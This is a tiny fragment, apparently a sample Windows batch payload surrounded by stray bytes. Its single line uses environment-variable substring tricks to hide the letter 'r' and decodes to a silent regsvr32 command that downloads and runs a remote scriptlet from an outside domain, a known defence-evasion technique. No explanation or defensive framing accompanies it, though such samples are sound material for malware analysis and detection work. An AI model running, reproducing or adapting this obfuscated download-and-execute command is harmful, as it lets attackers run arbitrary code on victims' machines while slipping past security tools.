 b Ç Ã
 @echo off %ALLUSERSPROFILE:~4,1%egsv%ALLUSERSPROFILE:~4,1%32.exe /s /n /i:http://T%ALLUSERSPROFILE:~4,1%SPhqEiXcoDvwLOZlAsjUkmNgKFQzdeMpyI%ALLUSERSPROFILE:~4,1%CnJHaxubtGYBWVf.com/n0tm4lw4%ALLUSERSPROFILE:~4,1%3  b Ç Ã
